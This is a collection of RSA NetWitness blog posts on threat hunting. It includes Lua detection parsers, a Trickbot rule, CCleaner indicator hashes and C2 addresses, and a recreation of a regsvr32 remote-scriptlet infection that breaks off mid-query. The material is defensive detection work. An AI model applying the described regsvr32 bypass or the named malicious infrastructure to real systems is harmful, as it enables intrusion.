Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > Authors Christopher Ahearn
1 2 Previous Next

RSA NetWitness Platform

18 Posts authored by: Christopher Ahearn Employee

There are many reasons I enjoy working with the RSA Netwitness Platform, but it’s when our customers turn their attention to threat hunting that really makes things exciting. In one case, there was a need where they could take new threat intelligence or research and apply it to their RSA Netwitness stack. This wasn’t directed at threat intelligence via feeds, but more around how attackers could deliver malicious content. Since there is never a shortage of threat research, one customer asked about detection of zero-width spaces.

 

In a recent article in The Hacker News, research was presented showing that zero-width spaces that were embedded within URL’s would be able to bypass URL scanners in Office 365. The question now is how to go about detecting this in Netwitness?

 

We begin with a search of our network using the following query:

 

Query
alias.host contains "​","‌","‍","","0"

 

This gave us several DNS sessions and a single SMTP session.

 

If we pivot into the SMTP session, we can get slightly better view of the meta for that session.

 

That last hostname in ‘alias.host’ does look interesting, but not sure. We need to examine the session more closely.

 

We rendered the session as an email and it bore the signs of a classic phishing email.

 

However, only when we examine the raw contents of it, does the malicious indicator present itself.

 

The bytes highlighted in red (E2 80 8C) represent the zero-width non-joiner character (&#8204). This appears to be the attackers use of zero-width spaces as a bypass attempt in a phishing email. Next we look at the meta data for the session.

 

Above, we can see our suspicious hostname, but how did it get there. Turns out that the ‘phishing_lua’ parser will examine URL’s within SMTP traffic and extract the hostnames it finds into the ‘alias.host’ meta key. Fortunately for us, it included the zero-width space as part of the meta data…we just can’t see it. Or can we?

 

I copied the meta value for the hostname and then pasted it into my text editor. Sadly, I did not notice any strange characters. However, I did paste it into my good friend ‘vi’.

 

This proved that the zero-width spaces were in the meta data, which allowed our query to work successfully. The malicious site actually leads to a credential stealing webpage.  It appears that the website was a compromised wordpress site.

 

Next, I wanted to get a bigger data set. I took some of the meta data, such as the email address of the sender, and used it to find additional messages. Turned out, this helped identify an active phishing campaign.

 

Next up is to put together some kind of detection going forward. My first thought was to use an application rule, but was not successful. I think it was the way the Unicode was being interpreted or how it was inputted. I need to do more research on that. Since the app rule syntax was not working properly, I decided to build a Lua parser instead. This parser would perform the meta callback function of the “alias.host” meta key, just like an app rule would. Next, the parser would loop through a predefined list of zero-width space bytes against the returned meta value. If a match was made, it would write meta into the ‘ioc’ meta key. 

 

lua_zws_check.lua

-- Step 1 Name the parser
local lua_zws_check = nw.createParser("lua_zws_check", "Check alias.host meta for zero-width spaces")

--[[

DESCRIPTION

Check alias.host meta for zero-width spaces


VERSION

2019-01-24 - Initial development

AUTHOR

christopher.ahearn@rsa.com


DEPENDENCIES

None

META KEYS



NOTES

https://thehackernews.com/2019/01/phishing-zero-width-spaces.html?m=1
http://www.amp-what.com/unicode/search/zero%20width

--]]

 

-- Step 3 Define where your meta will be written
-- These are the meta keys that we will write meta into
lua_zws_check:setKeys({

nwlanguagekey.create("ioc", nwtypes.Text),

})

 

-- Step 4 DO SOMETHING
local zws = ({

 

["\226\128\139"] = true, -- ​ &NegativeMediumSpac zero width space
["\226\128\140"] = true, -- ‌ ‌ zero width non-joiner
["\226\128\141"] = true, -- ‍ ‍ zero width joiner
["\239\187\191"] = true, --  zero width no-break space
["\239\188\144"] = true, -- 0 fullwidth digit zero

})

 

-- This is our function. What we want to do when we match a token...or in this case, the
-- filename meta callback.
function lua_zws_check:hostMeta(index, meta)

if meta then

for i,j in pairs(zws) do

local check = string.find(meta, i)
if check then

--nw.logInfo("*** BAD HOSTNAME CHECK: " .. meta .. " ***")

nw.createMeta(self.keys["ioc"], "hostname_zero-width_space")
break

end

end 

end

end

 

-- Step 2 Define your tokens
lua_zws_check:setCallbacks({

[nwlanguagekey.create("alias.host")] = lua_zws_check.hostMeta, -- this is the meta callback key

})

 

 

After deploying the parser, I re-imported the new pcap file into my virtual packet decoder. The results came back quickly. I now had reliable detection for these zero-width space hostnames.

 

Since meta is displayed in the order in which it was written, we can get a sense as to the hostname that triggered this indicator.

 

Now that we have validated that the parser is working correctly in the lab environment, it was time to test some other capabilities of the Netwitness platform.

 

As we stated in the beginning, the query (as well as the parser) was flagging on DNS name resolutions that involved Unicode characters. Therefore, we wanted to create an alert when we saw the ‘zero-width’ meta when it was in SMTP traffic. We then created an ESA rule in the lab environment.

 

To begin this alert, I went to the Configure / ESA Rules section in Netwitness and created a new rule using the Rule Builder wizard.

 

 

We gave the rule a name, which will be important in the next phase. Next, we created the condition by giving the condition a name and then populating the fields.

The first line is looking for the meta key and the meta value. The second is looking at the service type. Once it looks good, we hit save. We then hit save again and close out the rule.

 

NOTE: In the first line, you see the “Array?” box checked. Some meta keys are defined as arrays meaning they could contain multiple values in a session. The meta key ‘ioc’ is one such meta key. You may encounter a situation where a meta key should be set as an Array but is not. If that is the case, it is a simple change on the ESA configuration.

 

Next, we want to deploy the rule to our ESA appliance. To do, we clicked the ESA appliance in our deployments table.

Next, we add the rule we want to deploy. Then, we deploy it.

 

We then imported the PCAP again to see if our ESA rule fired successfully, which it did.

 

The last piece before production is to create an Incident rule, based on the ESA alerts. We move to Configure / Incident Rules and create a new rule.

I created the Incident rule in the lab and used the parameters shown below.

 

I then enabled the rule and saved it.

 

Now, when the incidents are examined in the Respond module, we can see our incidents being created.

 

To summarize this activity, we started from some new(ish) research and wanted to find a way to detect this in Netwitness. We found traffic that we were interested in and then built a Lua parser to improve our detection going forward. Next, I wanted to alert on this traffic only when it was in SMTP traffic and, because I wanted to work on some automation, created an Incident rule to put a bow on this. We now have actionable alerting after small bit of research on our end.  My intent is to get the content of the parser added to one already in Live.  Until that time, it will be here to serve as a reference.

 

What are your use cases? What are some things you are trying to find on the network that Netwitness can help with? Let us know.

 

Good luck and happy hunting.

Often times, RSA NetWitness Packet decoders are configured to monitor not only ingress and egress traffic, but also receive internal LAN traffic as well.  On a recent engagement, we identified a significant amount of traffic going to TCP port 9997.  It did not take long to realize this traffic was from internal servers configured to forward their logs to Splunk.

 

The parser will add to the 'service' meta key and write the value '9997'.  After running the parser for several hours, we also found other ports that were used by the Splunk forwarders.  

 

While there wasn't anything malicious or suspicious with the traffic, it was a significant amount of traffic that was taking up disk space.  By identifying the traffic, we can make it a filtering candidate.  Ideally, the traffic would be filtered further upstream at a TAP, but sometimes that isn't possible.  

 

If you are running this parser, you could also update the index-concentrator-custom.xml and add an alias to the service types.  

 

 

...

 

 

If you have traffic on your network that you want better ways to identify, let your RSA account team know.  

 

Good luck, and happy hunting.

I was recently working with Eric Partington who asked if we could get the Autonomous System Numbers from a recent update to GEOIP.  I believe at one point this was a feed, but had been deprecated.  After a little bit of research, I learned that an update had been made to the Lua libraries that allowed for the calling of a new api function named geoipLookup that would give us this information as well as some other information that might be of interest.  A few years ago, I painstakingly created a feed for my own use to map countries to continents.  I wish I had this function call back then.

 

The api call is as follows:

 

geoipLookup

-- Examples:
-- local continent = self:geoipLookup(ip, "continent", "names", "en") -- string
-- local country = self:geoipLookup(ip, "country", "names", "en") -- string
-- local country_iso = self:geoipLookup(ip, "country", "iso_code") -- string "US"
-- local city = self:geoipLookup(ip, "city", "names", "en") -- string
-- local lat = self:geoipLookup(ip, "location", "latitude") -- number
-- local long = self:geoipLookup(ip, "location", "longitude") -- number
-- local tz = self:geoipLookup(ip, "location", "time_zone") -- string "America/Chicago"
-- local metro = self:geoipLookup(ip, "location", "metro_code") -- integer
-- local postal = self:geoipLookup(ip, "postal", "code") -- string "77478"
-- local reg_country = self:geoipLookup(ip, "registered_country", "names", "en") -- string "United States"
-- local subdivision = self:geoipLookup(ip, "subdivisions", "names", "en") -- string "Texas"
-- local isp = self:geoipLookup(ip, "isp") -- string "Intermedia.net"
-- local org = self:geoipLookup(ip, "organization") -- string "Intermedia.net"
-- local domain = self:geoipLookup(ip, "domain") -- string "intermedia.net"
-- local asn = self:geoipLookup(ip, "autonomous_system_number") -- uint32 16406
function parser:geoipLookup(ipValue, category, [name], [language]) end

 

As you know, we already get many of these fields already.  Meta keys such as country.src, country.dst, org.src, and org.dst are probably well known to many analysts and used for various queries.  Eric had asked for 'asn' and because I tried it previously with a feed, I wanted to include 'continent' as well.  

 

So....I created a Lua parser to get this for me.  My tokens were meta callbacks for ip.src and ip.dst.

 

[nwlanguagekey.create("ip.src", nwtypes.IPv4)] = lua_geoip_extras.OnHostSrc,
[nwlanguagekey.create("ip.dst", nwtypes.IPv4)] = lua_geoip_extras.OnHostDst,

 

My intent is to build this parser to work on both packet and log decoders.  I had originally wanted to use another function call, but found this was not working properly on log decoders.  However, the meta callbacks of ip.src and ip.dst did work.  Now, with this in mind, I could leverage this parser on both packet and log decoders. :-)

 

The meta keys I was going to write into were as follows:

 

nwlanguagekey.create("asn.src", nwtypes.Text),
nwlanguagekey.create("asn.dst", nwtypes.Text),
nwlanguagekey.create("continent.src", nwtypes.Text),
nwlanguagekey.create("continent.dst", nwtypes.Text),

 

Since I was using ip.src and ip.dst meta, I wanted to apply the same source and destination meta for my asn and continent values.  

 

Then, I just wrote out my functions:

 

-- Get ASN and Continent information from ip.src and ip.dst
function lua_geoip_extras:OnHostSrc(index, src)
   local asnsrc = self:geoipLookup(src, "autonomous_system_number")
   local continentsrc = self:geoipLookup(src, "continent", "names", "en")

   if asnsrc then
      --nw.logInfo("*** ASN SOURCE: AS" .. asnsrc .. " ***")
      nw.createMeta(self.keys["asn.src"], "AS" .. asnsrc)
   end
   if continentsrc then
      --nw.logInfo("*** CONTINENT SOURCE: " .. continentsrc .. " ***")
      nw.createMeta(self.keys["continent.src"], continentsrc )
     end
end

 

function lua_geoip_extras:OnHostDst(index, dst)
   local asndst = self:geoipLookup(dst, "autonomous_system_number")
   local continentdst = self:geoipLookup(dst, "continent", "names", "en")

 

   if asndst then
      --nw.logInfo("*** ASN DESTINATION: AS" .. asndst .. " ***")
      nw.createMeta(self.keys["asn.dst"], "AS" .. asndst)
   end
   if continentdst then
      --nw.logInfo("*** CONTINENT DESTINATION " .. continentdst.. " ***")
      nw.createMeta(self.keys["continent.dst"], continentdst)
   end
end

 

This was my first time using this new api call and my mind was racing with ideas on how else I could use this capability.  The one that immediately came to mind was enriching meta when X-Forwarded-For or Client-IP meta existed.  If it did exist, it should be parsed into a meta key called "orig_ip" today or "ip.orig" in the future.  The meta key "orig_ip" is formatted as Text so I need to account for that by determining the correct HostType.  We don't want to pass a domain name when we are expecting to pass an IP address.  I can do that by importing the functions from 'nwll'.

 

In the past, the only meta that could be enriched by GEOIP was ip.src and ip.dst (I have not tested ipv6.src or ipv6.dst).  Now with this API call, I can apply the content of GEOIP to other IP address related meta keys.  I have attached the full parser to this post.  

 

Hope this helps others out there in the community and as always, happy hunting.

 

Chris

I have found that there is quite a lot of incredibly useful meta packed into the 'query' meta key over the past several years.  The HTTP parser puts arguments and passed variables in there when used in GET's and POST's.  While examining some recent PCAP's from the Malware Traffic Analysis site, there are some common elements we can use to identify Trickbot infections.  This was not an exhaustive look at Trickbot, but simply a means to identify some common traits as meta values.  As Trickbot, or any malware campaign changes, IOC's will need to be updated.

 

First things first, let's look at the index level for the 'query' meta key.  By default, the 'query' meta key is set to 'IndexKeys'.  This means that you could perform a search where the key existed in a session, but could not query for the values stored within that key.

 

 

There are pro's and con's to setting the index level to 'IndexValues' in your 'index-concentrator-custom.xml' file on your concentrators.  Some pro's include being able to search for values in there during an investigation.  The con's are that these queries would likely involve 'contains' which taxes the query from a performance perspective.  Furthermore, 'query' is a Text formatted meta key and limited to 256 bytes.  Therefore, anything that after 256 bytes would be truncated and you may not have the complete query string.

 

Whether 'query' is set to 'IndexKeys' or 'IndexValues' or even 'IndexNone', we can take advantage of it in App rule creation.  In one Trickbot pcap, we can see an HTTP POST to an IP address on a non-standard port.

 

 

If we look at the meta created for this session, we can see the 'proclist' and 'sysinfo' as pieces in the 'query' meta.

 

 

Combine these with a service type (service = 80) and an action (action = 'post'), we can create an application rule that can help find Trickbot infections in the environment.  For good measure, we can add additional meta from analysis.service to help round it out.

 

 

Trickbot application rule
service = 80 && action = 'post' && query = 'name="sysinfo"' && query = 'name="proclist"' && analysis.service = 'windows cli admin commands'

 

 

The flexibility of app rule creation allows for analysts and threat hunters take a handful of indicators (meta) and combine them to make detection easier.

 

 

App rules help make detection easier.  Once a threat is identified, we can use this method to find the traffic easier moving forward so that we can go find the next new bad thing.  If the app rule fires too often on normal traffic, then we can adjust the rule to add or exclude other meta to ensure it is firing correctly.

 

As always, good luck, and happy hunting.

 

Chris

I was reviewing a packet capture file I had from a recent engagement. In it, the attacker had tried unsuccessfully to compress the System and SAM registry hives on the compromised web server. Instead, the attacker decided to copy the hives into a web accessible directory and give them a .jpg file extension. Given that the Windows Registry hives contain a well documented file structure, I decided to write a parser to detect them on the network.

 

 

If we see something on the wire, there is a pretty good chance we can create some content to detect it in the future. This is the premise behind most threat-hunting or content creation. Make it easier to detect the next time. This is the same approach I take when building Lua Parsers for the RSA NetWitness platform.

 

Here, we can see what appears to be the magic bytes for a registry file “regf”.

 

 

Let’s shift our view into View Hex and examine this file.

 

 

When creating a parser, we want to make it as consistent as possible to reduce false positives or errors. What I found was that immediately following the ‘regf’ signature the Primary Sequence Number (4 bytes) and Secondary Sequence Number (4 bytes) would be different. Then, there was the FileTime UTC (8 bytes) field which would most definitely be unique.

 

However, the Major and Minor versions were relatively consistent. Therefore, I could skip over those 16 bytes to land on the first byte of the Major Version immediately after my initial token matches.  Let’s create a token to start with.

 

fingerprint_reg:setCallbacks({

   ["\114\101\103\102"] = fingerprint_reg.magic,   -- regf

}) 

 

If you notice, this token is in DECIMAL format, not HEX. Also, 4 bytes is quite small for a token. What happens is that when a parser is loaded into the decoder, the tokens are stored in memory and compared as network traffic is going through the decoder. Once a token matches, the function(s) within the parser are run. Too small of a token means the parser may run quite frequently with or without matching on the right traffic. Too large of a token means the parser may only run on those specific bytes and you could miss other relevant traffic. When creating a parser token, you may want to error on the side of caution and make it a little smaller but know that you will have to add additional checks to ensure it is the correct traffic you want.

 

In Lua for parsers, you are always on a byte. Therefore, we need to know where we are and where we want to go. I like to set a variable called ‘current_position’ to denote where my pointer is in the stream of data. When the parser matches on a token, it will return 3 values. The three values are the token itself, the first position of the token in the data stream and the last position of the token in the data stream. This helps me as I want to find the ‘regf’ token and move forward 17 bytes to land on the Major version field.

 

function fingerprint_reg:magic(token, first, last)

                  current_position = last + 17

                  local payload = nw.getPayload(current_position, current_position + 7)

                  if payload and #payload == 8 then

                                    local majorversion = payload:uint32(1, 4)

                                    if majorversion == 16777216 then

                                                      local minorversion = payload:uint32(5, 8)

                                                      if minorversion == 50331648 or minorversion == 67108864 or minorversion == 83886080 or minorversion == 100663296 then

                                                                        nw.createMeta(self.keys["filetype"], "registry hive")

                                                      end

                                    end

                  end

end

This will put the pointer on the first byte (0x01) of the Major Version field. Next what I want to do is extract only the payload I need to do my next set of checks, which will involve reading the bytes.

 

function fingerprint_reg:magic(token, first, last)

                  current_position = last + 17

                  local payload = nw.getPayload(current_position, current_position + 7)

                  if payload and #payload == 8 then

                                    local majorversion = payload:uint32(1, 4)

                                    if majorversion == 16777216 then

                                                      local minorversion = payload:uint32(5, 8)

                                                      if minorversion == 50331648 or minorversion == 67108864 or minorversion == 83886080 or minorversion == 100663296 then

                                                                        nw.createMeta(self.keys["filetype"], "registry hive")

                                                      end

                                    end

                  end

end

 

Here, I created a variable called ‘payload’ and used the built-in function ‘nw.getPayload’ to get the payload I wanted. Since I previously declared a variable called ‘current_position’, I use that as my starting point and tell it to go forward 7 bytes. This gives me a total of 8 bytes of payload. Next, I make sure that I have payload and that it is, in fact, 8 bytes in length (#payload == 8).

 

function fingerprint_reg:magic(token, first, last)

                  current_position = last + 17

                  local payload = nw.getPayload(current_position, current_position + 7)

                  if payload and #payload == 8 then

                                    local majorversion = payload:uint32(1, 4)

                                    if majorversion == 16777216 then

                                                      local minorversion = payload:uint32(5, 8)

                                                      if minorversion == 50331648 or minorversion == 67108864 or minorversion == 83886080 or minorversion == 100663296 then

                                                                        nw.createMeta(self.keys["filetype"], "registry hive")

                                                      end

                                    end

                  end

end

 

 

If the payload checks out, then in this parser, I want to read the first 4 bytes, since that should be the Major Version. In the research I did, I saw that the Major Version was typically ‘1’ and was represented as ‘0x01000000’. Since I want to read those 4 bytes, I use “payload:uint32(1,4)”. Since those bytes will be read in as one value, I pre-calculate what that should be and use it as a check. The value should be ‘16777216’. If it is, then it should move to the next check.

 

function fingerprint_reg:magic(token, first, last)

                  current_position = last + 17

                  local payload = nw.getPayload(current_position, current_position + 7)

                  if payload and #payload == 8 then

                                    local majorversion = payload:uint32(1, 4)

                                    if majorversion == 16777216 then

                                                      local minorversion = payload:uint32(5, 8)

                                                      if minorversion == 50331648 or minorversion == 67108864 or minorversion == 83886080 or minorversion == 100663296 then

                                                                        nw.createMeta(self.keys["filetype"], "registry hive")

                                                      end

                                    end

                  end

end

 

The Minor Version check winds up being the second and last check to make sure it is a Registry hive. For this to run, the Major version had to have been found and validated based on the IF statement. Here, we grab the next 4 bytes and store those in a variable called ‘minorversion’. There were four possible values that I found in my research. Those would be ‘0x03000000’, ‘0x04000000’, ‘0x05000000’, and ‘0x06000000’. Therefore, I pre-calculated those values in decimal form like I did with the Major Version and did a comparison (==). If the value matched, then the parser will write the text ‘registry hive’ as meta into the ‘filetype’ meta key.

 

The approach shown here was useful in examining a particular type of file as it was observed in network traffic. The same approach could be used for protocol analysis, identifying new service types, and many others as well.  If you would like expert assistance with creating a custom parser for traffic that is unique in your environment then that is a common service offering provided by RSA.  If you're interested in this type of service offering, please feel free to contact your local sales rep.  

 

The parser is attached, and I have also submitted it to RSA Live for future use.  I hope you find this parser breakdown helpful and as always, happy hunting.

 

Chris

Servers are attacked every day and sometimes, those attacks are successful.  There is a lot of attention to Windows executables that come down on the wire, but I also wanted to know when my systems were downloading ELF files, typically used by Linux systems.  With some recent exploits that target Linux web servers and the delivery of crypto-mining software, I wrote a parser that attempts to identify Linux ELF files and places that meta in the 'filetype' meta key.

 

 

 

This isn't limited to crypto-mining ELF files and has detected many others in testing.  The parser is attached below.

 

I hope you find this parser useful, and as always, happy hunting.

 

Chris

Whenever I am on an engagement that involves the analysis of network traffic, my preferred tool of choice is the RSA NetWitness Network (Packets) solution.  This provides full packet capture and allows for analysts to "go back to the video tape" to see what happened on the wire.  When the decoder examines the traffic, it tries to identify the service type associated with it.  HTTP, DNS, SSL and many others are some examples.  However, there are times when there is no defined service.  This results in 'service = 0'.  

 

When time allows, I like to go in there, but as you may notice, there can be quite a lot of data to go through.  Therefore, I like to focus on small slices of time and attributes about those sessions that makes sense.  For example, I might choose the following query over the last 3 hours.

 

   service = 0 && ip.proto = 6 && direction = 'outbound' && tcpflags = 'syn' && tcpflags = 'ack' && tcpflags = 'psh'

 

This query will get to the sessions where:

   service = 0 [OTHER traffic not associated with a service type]

   ip.proto = 6 [TCP traffic]

   direction = 'outbound' [traffic that starts internally and destined for public IP space]

   tcpflags = [Focus on SYN, ACK, and PSH because those TCP flags would have to be present for the starting of a session and the sending of data]

 

Next, I look at associated TCP ports (tcp.srcport and tcp.dstport) as well as some IP's and org.dst meta.  What we recently found was a pipe delimited medical record in clear text.  After some additional research, we came across this fantastic blog post from Tripwire discussing Health Level 7 (HL7).  In it, the author, Dallas Haselhorst, even showed the pipe delimited format that the HL7 protocol uses to transfer this data.  It was this format that was observed on the wire.

 

While the idea of medical records being transmitted on the wire in clear text was alarming at first, it was determined that this was in fact, a standard practice.  If used to cross the Internet, VPN tunnels would be used.

 

To get a sense of how much traffic I could see, I created a parser to identify this as 'service = 6046'.  I chose '6046' because that was the first port I observed, however in truth, we eventually saw it on numerous tcp.dstport's.  This parser is just going to identify this as HL7 and will not parse out the information contained in the fields.  Some of that data will likely contain Personal Health Information and it is not something I wanted as meta.  But, knowing it is on the wire in the clear was important to me and my client.  

 

If you work in an organization that handles this kind of data, this parser might help identify and validate where it's going.  

 

Good luck, and happy hunting.  Also..special thanks to one of my new team-mates, Jeremy Warren, who helped find this traffic.

 

Chris

If you attended my sessions on Lua Parsing in NetWitness, we referenced some materials as well as a parser template I use when starting to write a Lua parser.  I wanted to share that material here.  Be sure to check out the examples as well as the nw-api.lua as references when building your own.

 

As always, if you have questions, please reach out.

 

Thanks,

 

Chris

By now the InfoSec community had a chance to digest the recent findings around the popular software "CCleaner" and a compromised version.  Great research was provided by the TALOS Intelligence group here and here.  The question on the minds of senior leadership becomes what the impact could be to the organization.  The ability to query the systems in the enterprise for such threats is essential to answering that business impact question.  Avast posted additional findings in their own blog and this is where our post begins.

 

Avast provided several indicators of compromise (IOC's) that would allow security teams to quickly scan their environment to identify known or suspicious files or communications.  Let's start with the first stage indicators.

 

There were twenty (20) SHA256 hashes of files in the list.  Since the list was not in a particular format (STIX, TAXI, CSV, etc) we can scrape them from the page and paste them into our old friend "vi".

 

 

Essentially what we need to do is get the provided indicator into a form that our tools can use.  Our first attempt is to just show the hash itself.

 

      awk -F' - ' '{print $1}' ccleaner

 

 

We can then go over to NetWitness Endpoint looking for these hashes.  One could be looking for all instances of 'ccleaner' in the Global Modules and looking at the SHA256 hash value.  Sometimes looking at Compile Time is also helpful.

 

You can also go into the Filter Editor and enter the hashes here as well.  

 

Another option is performing the query directly against the SQL database.  Similar to using the Filter Editor method above, we simply need to get the query built in a way that works.  Since it will be a large OR statement, we just need the right syntax and the location where the values are stored.  The hashes are stored in the database in dbo.Modules.HashSHA256.  Knowing this, we can get the necessary syntax with our other good friend 'awk'.

 

      awk -F" - " '{print "OR mo.HashSHA256 = 0x"$1}' ccleaner

 

NOTE:  "OR mo.HashSHA256 = 0x" was prepended to query that column.  0x was also prepended to the hash as the data is stored in that way.

 

This returns the values in a form that I can easily query.  Now, I just need the query.

 

Module_Hash_to_MachineName

--Search for a machinename based on the hash of a module

select mn.machinename, mo.HashSHA256

from

    [dbo].[MachineModulePaths] AS mp

    INNER JOIN [dbo].[Machines] AS [mn] WITH(NOLOCK) ON ([mn].[PK_Machines] = [mp].[FK_Machines])

    INNER JOIN [dbo].[Modules] AS [mo] WITH(NOLOCK) ON ([mo].[PK_Modules] = [mp].[FK_Modules])

where

    --mo.HashMD5 = 0xCEDC22719DE1B1316BDC556FED989335

    --mo.HashSHA256 = 0x069F24378A0A6EEA078D30D971542741D0F51E1F933EEEB23FDB559763FF0ACD

    --mo.HashSHA1 = 0x39E0F0F2F64B50FB9783A49B7940BF326D7B6B65

 

-- First Stage

mo.HashSHA256 = 0x04bed8e35483d50a25ad8cf203e6f157e0f2fe39a762f5fbacd672a3495d6a11

OR mo.HashSHA256 = 0x0564718b3778d91efd7a9972e11852e29f88103a10cb8862c285b924bc412013

OR mo.HashSHA256 = 0x1a4a5123d7b2c534cb3e3168f7032cf9ebf38b9a2a97226d0fdb7933cf6030ff

OR mo.HashSHA256 = 0x276936c38bd8ae2f26aab14abff115ea04f33f262a04609d77b0874965ef7012

OR mo.HashSHA256 = 0x2fe8cfeeb601f779209925f83c6248fb4f3bfb3113ac43a3b2633ec9494dcee0

OR mo.HashSHA256 = 0x3c0bc541ec149e29afb24720abc4916906f6a0fa89a83f5cb23aed8f7f1146c3

OR mo.HashSHA256 = 0x4f8f49e4fc71142036f5788219595308266f06a6a737ac942048b15d8880364a

OR mo.HashSHA256 = 0x7bc0eaf33627b1a9e4ff9f6dd1fa9ca655a98363b69441efd3d4ed503317804d

OR mo.HashSHA256 = 0xa013538e96cd5d71dd5642d7fdce053bb63d3134962e2305f47ce4932a0e54af

OR mo.HashSHA256 = 0xbd1c9d48c3d8a199a33d0b11795ff7346edf9d0305a666caa5323d7f43bdcfe9

OR mo.HashSHA256 = 0xc92acb88d618c55e865ab29caafb991e0a131a676773ef2da71dc03cc6b8953e

OR mo.HashSHA256 = 0xe338c420d9edc219b45a81fe0ccf077ef8d62a4ba8330a327c183e4069954ce1

OR mo.HashSHA256 = 0x36b36ee9515e0a60629d2c722b006b33e543dce1c8c2611053e0651a0bfdb2e9

OR mo.HashSHA256 = 0x6f7840c77f99049d788155c1351e1560b62b8ad18ad0e9adda8218b9f432f0a9

OR mo.HashSHA256 = 0xa3e619cd619ab8e557c7d1c18fc7ea56ec3dfd13889e3a9919345b78336efdb2

OR mo.HashSHA256 = 0x0d4f12f4790d2dfef2d6f3b3be74062aad3214cb619071306e98a813a334d7b8

OR mo.HashSHA256 = 0x9c205ec7da1ff84d5aa0a96a0a77b092239c2bb94bcb05db41680a9a718a01eb

OR mo.HashSHA256 = 0xbea487b2b0370189677850a9d3f41ba308d0dbd2504ced1e8957308c43ae4913

OR mo.HashSHA256 = 0x3a34207ba2368e41c051a9c075465b1966118058f9b8cdedd80c19ef1b5709fe

OR mo.HashSHA256 = 0x19865df98aba6838dcc192fbb85e5e0d705ade04a371f2ac4853460456a02ee3

 

-- Second Stage

 

OR mo.HashSHA256 = 0xdc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83

OR mo.HashSHA256 = 0xa414815b5898ee1aa67e5b2487a11c11378948fcd3c099198e0f9c6203120b15

OR mo.HashSHA256 = 0x7ac3c87e27b16f85618da876926b3b23151975af569c2c5e4b0ee13619ab2538

OR mo.HashSHA256 = 0x4ae8f4b41dcc5e8e931c432aa603eae3b39e9df36bf71c767edb630406566b17

OR mo.HashSHA256 = 0xb3badc7f2b89fe08fdee9b1ea78b3906c89338ed5f4033f21f7406e60b98709e

OR mo.HashSHA256 = 0xa6c36335e764b5aae0e56a79f5d438ca5c42421cae49672b79dbd111f884ecb5

 

I added the second stage hashes as well.  This query returns some results that would need additional checking.  

 

 

Next, we can move over to NetWitness for Packets and Logs and see if we have any hits.

 

      ip.dst=216.126.225.148,216.126.225.163

 

 

No hits here, thankfully.  

 

There were also some domain generated algorithms (DGA's) used and provided in the listing of IOC's.  Using "vi" again, we copied the contents into a file like before.

 

 

Then, using a similar "awk" statement we generate the query for use in the NetWitness suite.

 

      awk -F" - " '{print "\x27"$1"\x27,"}' c2 | sed 's/ //g' | tr -d '\n'

 

NOTE: \x27 prints a single quote

sed 's/ //g' removes some trailing whitespace as a result of the copy/paste.

tr -d '\n' removes the new line so they all appear on the same line.

 

Armed with this syntax, I can copy and paste into NetWitness.  Since we are querying the same key for multiple values, we can separate using a comma.  However, since we are using "alias.host", which is a Text formatted meta key, we need to ensure the values are enclosed in quotes for our query.

 

 

Again, no findings.

 

The presence of compromised files might mean the declaration of an incident and the launching of larger forensic investigation depending on the organization.  At this point, we know the files were here, but we might not have been a target based on currently available research.   

 

In summary, searching for indicators of compromise using the NetWitness suite is a great first step in identifying potential problems in your environment.  Sometimes the data isn't provided in an easy to use format, however with some quick command line techniques, you can have that data massaged into a format ready to query.  This whole exercise took a few moments to complete and we can begin to answer what the impact is to the business.

 

As always, know your data and happy hunting.

 

Chris

 

If you did identify the presence of these or other suspicious or compromised files in your organization, our RSA Incident Response team is here to assist with the triage.  If you have an IR Retainer in place with RSA then you already have rapid access to our analysts who can get engaged and rapidly identify the scope of the incident.  If you don’t have an IR Retainer or are interested in learning more about our Incident Response services, please visit our Incident Response Services page on RSA.com

Recently, I was using Netwitness Endpoint (ECAT) to help triage a large environment.  During this time, I identified a few systems that were exploited by malicious html file.  It was part of a phishing campaign that came in via email.  Unfortunately, I was unable to find the file because it was no longer in the Outlook Temporary Internet Files folder.  However, since we have tracking data coming in from the agents, I was able to recreate the scene even without the initial malicious code.

 

The original compromise showed tracking data like the one below:

 

 

Here we can see that Outlook starts up Chrome to open a file in the Outlook Temporary Internet Files directory.  From there we see regsvr32.exe kicked off that had a URL in it's launch arguments.  The regsvr32.exe is a legitimate and signed Microsoft file used to register DLL's and other controls into the Windows Registry.  Last year, researcher Casey Smith described how this component could take a URL to a remote file as an argument to bypass various security controls.  The URL could be over HTTP or HTTPS and would point to an SCT file.  This SCT file is really just an XML file with instructions on what regsvr32.exe should do.

 

With the tracking data showing us step by step what occurred on the system, we can use these commands on a different system and attempt to recreate the infection.  

 

On my analysis system, I opened a command prompt and ran that started this off.  

 

This URL took us to the malicious script on a Google API site over SSL.  The contents of that SCT file can be seen below:

 

 

In there we see the syntax the JSRat is going to execute leveraging mshta as well as another URL.  This new 'terra' URL sends another XML scriptlet to download and install a malicious dll called 'rubyonrais.dll'.

 

 

 

Tracking data in our analysis system looks very similar to what our original host showed along with the registering of the DLL.

 

 

If we take a look at the network traffic associated with this, we can get insight into what was happening as well.  

 

 

We can see the request to 'storage.googleapis.com' over SSL and then the connection to 'meubackup.terra[.]com[.]br'.  This downloaded a 1.4mb file based on the network traffic.  Even though this is an SSL connection, we can still see the meta data about that session.  I can now go and find the file where the script told us it would be.  In the C:\Users\Public\Administrator folder.

 

 

Currently this could be picked up with the IIOC "Runs mshta with javascript arguments".

 

Another we could create is slightly different than one out of the box to cover both HTTP and HTTPS connections.  

 

Regsvr32_runs_with_HTTP_argument

--Runs_REGSVR32_HTTP.sql Runs REGSVR32.EXE with HTTP argument 

/* DB Query

 

SELECT mn.MachineName, se.EventUTCTime, sfn.Filename, se.FileName_Target, se.Path_Target, se.LaunchArguments_Target, sla.LaunchArguments

 

FROM

[dbo].[WinTrackingEvents_P0] AS [se] WITH(NOLOCK) -- Also try P1
INNER JOIN [dbo].[MachineModulePaths] AS [mp] WITH(NOLOCK) ON ([mp].[PK_MachineModulePaths] = [se].[FK_MachineModulePaths])
INNER JOIN [dbo].[FileNames] AS [sfn] WITH(NOLOCK) ON ([sfn].[PK_FileNames] = [mp].[FK_FileNames])
INNER JOIN [dbo].[machines] AS [mn] WITH(NOLOCK) ON [mn].[PK_Machines] = [se].[FK_Machines]
INNER JOIN [dbo].[LaunchArguments] AS [sla] WITH(NOLOCK) ON [sla].[PK_LaunchArguments] = [se].[FK_LaunchArguments__SourceCommandLine]

 

WHERE

[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
